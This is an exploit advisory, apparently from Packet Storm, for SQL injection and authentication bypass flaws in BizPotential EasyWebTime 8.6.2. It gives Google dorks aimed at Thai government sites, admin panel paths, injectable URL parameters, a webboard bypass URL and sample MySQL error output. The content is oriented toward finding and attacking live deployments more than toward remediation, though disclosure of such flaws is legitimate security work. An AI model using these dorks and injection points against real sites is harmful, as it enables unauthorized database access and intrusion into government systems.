BizPotential EasyWebTime version 8.6.2 suffers from bypass and remote SQL injection vulnerabilities.
a95c35154ec1850956499af9bb388a6f92f4a70ac157a1fffaa5fbf66ee30933#############################################################
# Exploit Title : BizPotential EasyWebTime 8.6.2 SQL Injection / Bypass
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : bizpotential.com ~ ewtadmin.com
# Software Information Link : bizpotential.com/overview.php
# Software Affected Version : 8.6.2 and all previous versions.
# Software Price : 100$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-592 - Authentication Bypass Issues
# CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018090088
#############################################################
BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability
#############################################################
# Google Dorks :
*****************
inurl:''/ewtadmin/'' site:go.th
inurl:''/main.php?filename='' site:go.th
inurl:''/ewtadmin/ewt/ccs/''
intext:''(c) Copyright 2007 - BizPotential.com - All Rights Reserved.''
intext:''Copyright 2007 - BizPotential Co., Ltd. - All Rights Reserved''
#############################################################
# Admin Control Panel Paths :
***************************
/ewtadmin/index.php
/ewtadmin82/
/ewtcommittee/index2331.php
/ewtadmin/ewt/DOMAINNAMEHERE_intranet/ewt_login.php
#############################################################
# SQL Injection Exploit :
***********************
/n_more3.php?page=[ID-NUMBER]&c_id=[SQL Injection]
/ewtadmin/ewt/[DOMAINNAME_web/n_more.php?c_id=[SQL Injection]
/more_news.php?offset=[SQL Injection]
/more_news.php?offset=-[ID-NUMBER]&cid=&startoffset=[SQL Injection]
#############################################################
# Webboard Exploit Bypass :
**************************
/ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1&filename=webboard
# Webboard Directory Path :
**************************
/ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard
/index_question.php?wcad=5&t=1&filename=webboard
ccs.DOMAINNAME.go.th/index_question.php?wcad=5&t=1&filename=webboard
#############################################################
# Example SQL Database Errors =>
********************************
SELECT * FROM article_list WHERE c_id = '199'' and n_approve = 'Y'
ORDER BY n_date DESC LIMIT -20,20
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '-20,20' at line 1
SELECT * FROM article_list WHERE ( c_id = '' ) AND n_approve =
'Y' AND (('2561-09-10 05:57:13' between n_date_start and n_date_end)
or (n_date_start = '' and n_date_end = '')) ORDER BY n_date
DESC,n_timestamp DESC LIMIT 60\\\',20
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '\\\',20' at line 1
#############################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#############################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed